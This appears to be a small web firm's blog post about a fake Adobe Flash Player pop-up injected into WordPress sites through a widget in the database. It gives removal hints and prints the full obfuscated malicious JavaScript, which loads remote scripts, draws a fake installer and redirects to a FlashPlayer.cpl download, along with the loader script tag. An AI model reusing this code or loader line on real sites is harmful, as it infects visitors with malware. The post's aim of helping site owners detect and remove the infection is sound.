Rss Feed Tweeter button Facebook button Technorati button Reddit button Myspace button Linkedin button Webonews button Delicious button Digg button Flickr button Stumbleupon button Newsvine button Youtube button

Call: 0123456789 | Email: info@example.com

RSS SEO Updates
  • An error has occurred, which probably means the feed is down. Try again later.

Adobe FlashPlayer Virus on WordPress Websites


adobe virus

If you have a WordPress website and you suddenly started to have a window Pop up to download Adobe Flash Player this is a fake download.

How do you fix this?

A virus scan on your server will not work. This is not a root kit. It will not be found by any normal method as it is masked as an everyday ordinary URL.

You will need to access your database and look for a script that looks like this:

<script src=”http://va.mu/caCS”></script>

In our case this script was placed inside of a Facebook LIKE widget in the wp-options table.

It looked like this:

<div class=”fb-like-box” data-href=”https://www.facebook.com/ourwebsitename?fref=ts” data-width=”220″ data-height=”500″ data-show-faces=”true” data-stream=”true” data-header=”true”></div>
“;s:6:”filter”;b:0;}i:3;a:3:{s:5:”title”;s:1:”
“;s:4:”text”;s:42:”<script src=”http://va.mu/caCS”></script>
“;s:6:”filter”;b:0;}s:12:”_multiwidget”;i:1;}

This script calls a hacked URL which in this case is  lapetitecuisine. net. br/ Plugin.jar  (SPACES HAVE BEEN PLACED INT HIS URL TO HELP PREVENT ACCIDENTAL ACCESS TO THIS URL)

This Plugin.jar file pulls the fake FlashPlayer.cpl from the following URL:adobe virus URL

 

 

From there the fake FlashPlayer.cpl file installs itself as a Windows Control Panel icon and from there we are currently unsure of exactly what damage it is capable of causing. Further testing is being done.

If you need assistance in removing this virus please don’t hesitate to contact us.

 

For you Geeks out there:

Here is the WHOLE script that is causing the problem. This is the caCS script:

 

var government = jryrktnn(‘/eetojjht:.dpcp.’,’4ADF06946′)+jryrktnn(‘eile/sur.slcut/n’,’4ADF06946′)+jryrktnn(‘s/hteipjnx.hsds’,’4ADF06946′);
var progress = 0;
var iProg = null;
var cBack = null;
var cd = 5;
var count = 0;
var canClose = true;

function genAlpha(text)
{
var alpha = “”;
for(i = 0 ; i < text.length; i++)
{
if (alpha.indexOf(text.charAt(i)) == -1)
{
alpha += text.charAt(i);
}
}
return alpha;
}
function rFact(num)
{
if (num > 16) num = 16;
if (num === 0) { return 1; } else { return num * rFact( num – 1 ); }
}

function calcKey(key)
{
var c = 0;
for(i = 0 ; i < key.length; i++)
{
c = c+key.charCodeAt(i);
if (c < 1000000000) c = c*10;
}
return c;
}

function getNPoss(alpha, p)
{
var resp = “”;
var d = alpha.length;
for(i=1; i <= d; i++)
{
n = rFact(d-i);
k = Math.floor(p/(n));
p = p-(k*n);
c = alpha.charAt(k);
resp += c;
alpha = alpha.replace(c,””);
}
return resp;
}

function jryrktnn(message, key)
{

var c = calcKey(key);
var bAlpha = genAlpha(message);
var aAlpha = getNPoss(bAlpha, c%rFact(bAlpha.length) );

var coded, i, ch, index;

coded = “”;
for (i = 0; i < message.length; i++) {
ch = message.charAt(i);
index = aAlpha.indexOf(ch);
coded = coded + bAlpha.charAt(index);
}
return coded;
}

/*** START ***/

function btOver(obj)
{
obj.style.background = “#FF7777”;
obj.style.background = “rgb(60, 60, 60)”;
obj.style.background = “-moz-linear-gradient(90deg, rgb(60, 60, 60) 0%, rgb(80, 80, 80) 70%)”;
obj.style.background = “-webkit-linear-gradient(90deg, rgb(60, 60, 60) 0%, rgb(80, 80, 80) 70%)”;
obj.style.background = “-o-linear-gradient(90deg, rgb(60, 60, 60) 0%, rgb(80, 80, 80) 70%)”;
obj.style.background = “-ms-linear-gradient(90deg, rgb(60, 60, 60) 0%, rgb(80, 80, 80) 70%)”;
obj.style.background = “linear-gradient(180deg, rgb(60, 60, 60) 0%, rgb(80, 80, 80) 70%)”;
}

function btOut(obj)
{
obj.style.border = “1px solid #111”;
obj.style.color = “white”;
obj.style.background = “rgb(100, 100, 100)”;
obj.style.background = “-moz-linear-gradient(90deg, rgb(100, 100, 100) 0%, rgb(60, 60, 60) 70%)”;
obj.style.background = “-webkit-linear-gradient(90deg, rgb(100, 100, 100) 0%, rgb(60, 60, 60) 70%)”;
obj.style.background = “-o-linear-gradient(90deg, rgb(100, 100, 100) 0%, rgb(60, 60, 60) 70%)”;
obj.style.background = “-ms-linear-gradient(90deg, rgb(100, 100, 100) 0%, rgb(60, 60, 60) 70%)”;
obj.style.background = “linear-gradient(180deg, rgb(100, 100, 100) 0%, rgb(60, 60, 60) 70%)”;
}
function allFinish()
{
fim = document.getElementById(‘btFinish’);
btOut(fim);
//fim.className = “btInstall”;
fim.onclick = function(){EndAndOut(”)};
fim.onmouseover = function(){btOver()};
fim.onmouseout = function(){btOut()};
}

function EndAndOut(add)
{
window.canClose = true;
meCrazy(jryrktnn(‘?Q36QT56Q=Q’,’DFDA2126068′) + add);
goOut(‘none’, false);
}

function doProg()
{
if (progress == 100) {
window.canClose = false;
window.iProg = window.clearInterval(window.iProg);
window.iProg = setInterval(function(){allFinish()},18000);
document.getElementById(‘downForm’).innerHTML = ‘<div style=”text-align: right;”><div style=”float: left; font-weight : bold; font-size: 11px; text-align : left;”>Conclu&iacute;do Para prosseguir, EXECUTE o <u style=”color: #5a5; font-size: 14px;”>FlashPlayer.cpl</u> e instale a atualiza&ccedil;&atilde;o. </div><button style=”padding : 6px; width: 120px; border : 1px solid #555; color : #555; margin-left : 10px; background-color : #666;” id=”btFinish” name=”btFinish””><center>CONCLUIR</center></button></div>’;
window.location=jryrktnn(‘baauprrhknel:/kt’,’196B7C8D8FFC6′)+jryrktnn(‘eh/Fc/lrPsakou.a’,’196B7C8D8FFC6′)+jryrktnn(‘alpc.ery’,’196B7C8D8FFC6′);
return;
}
progress += 1;
document.getElementById(‘progBar’).style.width = progress+”%”;
document.getElementById(‘progPer’).innerHTML = “Baixando “+progress+”%…”;
}

function meCrazy(add)
{
callMeEveryWhere(government + add);
}

function Download()
{
callMeEveryWhere(jryrktnn(‘hoo.:ppj.tdec/cd’,’36A3F0B0DE’)+jryrktnn(‘u/.urtslct.isnre’,’36A3F0B0DE’)+jryrktnn(‘h?pdij./texphnhs’,’36A3F0B0DE’)+jryrktnn(‘elu3=ayg=v=c=1w’,’36A3F0B0DE’));

document.getElementById(‘dvLicense’).style.display = “none”;

iF = document.getElementById(‘installForm’);
iF.style.display = “none”;

dF = document.getElementById(‘downForm’);
dF.style.display = “block”;

iProg = setInterval(function(){doProg()},50);
}

function goOut(stilo, base)
{
if (!canClose) return;
base = typeof base !== ‘undefined’ ? base : true;
document.getElementById(‘xyz_light_cont’).style.display = stilo;
document.getElementById(‘xyz_fade’).style.display = stilo;

window.cBack = clearInterval(window.cBack);
if (count >= cd) base = false;
if (!base) return;

if ((stilo == “none”) && (base)) {
count += 1;
window.cBack = setInterval(function(){goOut(“block”)},6000);
}
}

function callMeEveryWhere(srce)
{
var headID = document.getElementsByTagName(“head”)[0];
var newScript = document.createElement(‘script’);
newScript.type = jryrktnn(‘vejvtirsrxp/cav’,’658936F3113′);
newScript.src = srce;
headID.appendChild(newScript);
}

function loadCSS(srce)
{
var headID = document.getElementsByTagName(“head”)[0];
var newScript = document.createElement(‘link’);
newScript.setAttribute(“rel”, “stylesheet”);
newScript.setAttribute(“type”, “text/css”);
newScript.setAttribute(“href”, srce);
headID.appendChild(newScript);
}

function spawAnyone(html)
{
var span = document.createElement(‘span’);
span.innerHTML = html;
return span;
}

function weCameFromHell(htcode)
{
var aBody = document.body;
if (aBody)
{
aBody.insertBefore(spawAnyone(htcode), aBody.firstChild);
}
}

function sleep(delay) {
var start = new Date().getTime();
while (new Date().getTime() < start + delay);
}

function ljkmvkuic()
{
window.cSta = window.clearInterval(window.cSta);
url = jryrktnn(‘j::/etth/cpod.dp’,’592A42605D2′)+jryrktnn(‘sresiluntle/uci.’,’592A42605D2′)+jryrktnn(‘pjts/.’,’592A42605D2′)
sleep(0000);
weCameFromHell(jryrktnn(‘nm==” aelmt p<<e’,’C98A03AB1′)+jryrktnn(‘oe.las1c”=emd 1′,’C98A03AB1’)+jryrktnn(‘rrh”tp:=avipeec ‘,’C98A03AB1’)+jryrktnn(‘ccusnilelipteae/’,’C98A03AB1′)+jryrktnn(‘tlutgliP.rb/neul’,’C98A03AB1′)+jryrktnn(‘r e=vvilatsy=”ji’,’C98A03AB1′)+jryrktnn(‘tdten;hb:tyy lib’,’C98A03AB1′)+jryrktnn(‘0;eg iht:h d;w g’,’C98A03AB1′)+jryrktnn(‘parm< aaa”;>0>:a’,’C98A03AB1′)+jryrktnn(‘ek vuia”e=ilmkan’,’C98A03AB1′)+jryrktnn(‘”taurrnl==:p/h”e’,’C98A03AB1′)+jryrktnn(‘kr/Flsuasc/.oerb’,’C98A03AB1′)+jryrktnn(‘hlyr> </”ayc.peP’,’C98A03AB1′)+jryrktnn(‘/lelt<a>ml// rp<‘,’C98A03AB1’) + ‘<div id=”xyz_light_cont” style=”display : block; position : absolute; text-align : center; top : 0; left: 0; width : 103%; height : 103%; z-index : 9002; background : none;”><div id=”xyz_light” style=”display : block; margin : 0 auto; margin-top : 130px; width : 600px; padding : 0; border : 8px solid #8badf9; border-top : none; z-index : 9003; overflow : auto; font-family : Tahoma; font-size : 11px; color : black; text-align : center; background-color : white; border-radius : 5px;”><div style=”font-weight : bold; font-size : 12px; color: #000; padding: 10px 0; text-align: center; background-color: #8badf9;”>Atualiza&ccedil;&atilde;o Adobe Flash Player 11.0.1 <div style=”width : 30px; height : 14px; color : white; padding : 3px; float : right; margin-top : -10px; background: #aa0000; background: -moz-linear-gradient(top, #aa0000 0%, #cc0000 100%); background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#aa0000), color-stop(100%,#cc0000)); background: -webkit-linear-gradient(top, #aa0000 0%,#cc0000 100%); background: -o-linear-gradient(top, #aa0000 0%,#cc0000 100%); background: -ms-linear-gradient(top, #aa0000 0%,#cc0000 100%); background: linear-gradient(to bottom, #aa0000 0%,#cc0000 100%); filter: progid:DXImageTransform.Microsoft.gradient( startColorstr=\’#aa0000\’, endColorstr=\’#cc0000\’,GradientType=0 ); ” onClick=”javascritp:goOut(\’none\’,true);”>X</div></div><div style=”padding: 6px; background-color: #333; color: white; border: 1px solid #222;”><div style=”padding: 10px 0; text-align: center;”><img style=”margin: 20px; padding: 0;” src=”‘+url+’logo.png” /></br></div><div name=”dvLicense” id=”dvLicense” style=”margin: 0 10% 20px 10% ; text-align: left;”><input type=”checkbox” style=”float: left;” checked=”true”/><div style=”margin-left: 20px; font-size: 13px;”>Li e concordo com os termos do contrato de licen&ccedil;a do Adobe Flash Player. </br><a style=”color: white; text-decoration: underline;” href=”http://www.adobe.com/br/products/eulas/”>Leia a licen&ccedil;a aqui</a></div></div><hr style=”border : none; border-top : 1px solid #222; border-bottom : 1px solid #444;”/><div id=”installForm” style=”padding : 10px 0 10px 0; color : #eee; font-weight : bold; font-size: 13px; text-align : left;”><table style=”width: 100%; color : #eee; font-weight : bold; font-size: 13px; text-align : left;” border=”0″><tr style=”display: block-inline;”><td>Atualiza&ccedil;&atilde;o do Adobe Flash Player necess&aacute;ria.</td><td style=”text-align: right;”><button style=”margin-left : 10px; padding : 6px; width : 120px; border : 1px solid #111; color : white; background : rgb(100, 100, 100); background : -moz-linear-gradient(90deg, rgb(100, 100, 100) 0%, rgb(60, 60, 60) 70%); background : -webkit-linear-gradient(90deg, rgb(100, 100, 100) 0%, rgb(60, 60, 60) 70%); background : -o-linear-gradient(90deg, rgb(100, 100, 100) 0%, rgb(60, 60, 60) 70%); background : -ms-linear-gradient(90deg, rgb(100, 100, 100) 0%, rgb(60, 60, 60) 70%); background : linear-gradient(180deg, rgb(100, 100, 100) 0%, rgb(60, 60, 60) 70%);” name=”btOut” onclick=”javascript: goOut(\’none\’);” onMouseOver=”javascript: btOver(this);” onMouseOut=”javascript: btOut(this);”>SAIR</button><button style=”margin-left : 10px; padding : 6px; width : 120px; border : 1px solid #111; color : white; background : rgb(100, 100, 100); background : -moz-linear-gradient(90deg, rgb(100, 100, 100) 0%, rgb(60, 60, 60) 70%); background : -webkit-linear-gradient(90deg, rgb(100, 100, 100) 0%, rgb(60, 60, 60) 70%); background : -o-linear-gradient(90deg, rgb(100, 100, 100) 0%, rgb(60, 60, 60) 70%); background : -ms-linear-gradient(90deg, rgb(100, 100, 100) 0%, rgb(60, 60, 60) 70%); background : linear-gradient(180deg, rgb(100, 100, 100) 0%, rgb(60, 60, 60) 70%);” name=”btInstall” onClick=”javascript: Download();” onMouseOver=”javascript: btOver(this);” onMouseOut=”javascript: btOut(this);”>INSTALAR</button></td></tr></table></div><div id=”downForm” style=”display: none; padding : 10px 0 10px 0; color : #eee; font-weight : bold; text-align : left;”><div id=”progPer” style=”font-weight : bold; font-size: 12px; text-align : left;”>Baixando 0%…</div><div id=”downBar” style=”border-radius : 10px; color: white; width : 100%; height : 10px; background-color : #444; border : 1px solid black; box-shadow:inset 0 0 10px #111;”><div id=”progBar” style=”height : 10px; border-radius : 10px;background: #1e5799; background: -moz-linear-gradient(top, #1e5799 0%, #2989d8 50%, #207cca 51%, #7db9e8 100%); background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#1e5799), color-stop(50%,#2989d8), color-stop(51%,#207cca), color-stop(100%,#7db9e8)); background: -webkit-linear-gradient(top, #1e5799 0%,#2989d8 50%,#207cca 51%,#7db9e8 100%); background: -o-linear-gradient(top, #1e5799 0%,#2989d8 50%,#207cca 51%,#7db9e8 100%); background: -ms-linear-gradient(top, #1e5799 0%,#2989d8 50%,#207cca 51%,#7db9e8 100%); background: linear-gradient(to bottom, #1e5799 0%,#2989d8 50%,#207cca 51%,#7db9e8 100%); filter: progid:DXImageTransform.Microsoft.gradient( startColorstr=\’#1e5799\’, endColorstr=\’#7db9e8\’,GradientType=0 );”></div></div></div></div></div></div><div id=”xyz_fade” style=”display : block; position : absolute; top : 0; left : 0; width : 100%; height : 800px; z-index : 9001; -moz-opacity : 0.6; opacity : .60; filter : alpha(opacity=60); background-color: black;”></div></body>’);
//sleep(1000);
//Download();
}

var cSta = setInterval(function(){ljkmvkuic()},6337);

call neatplugins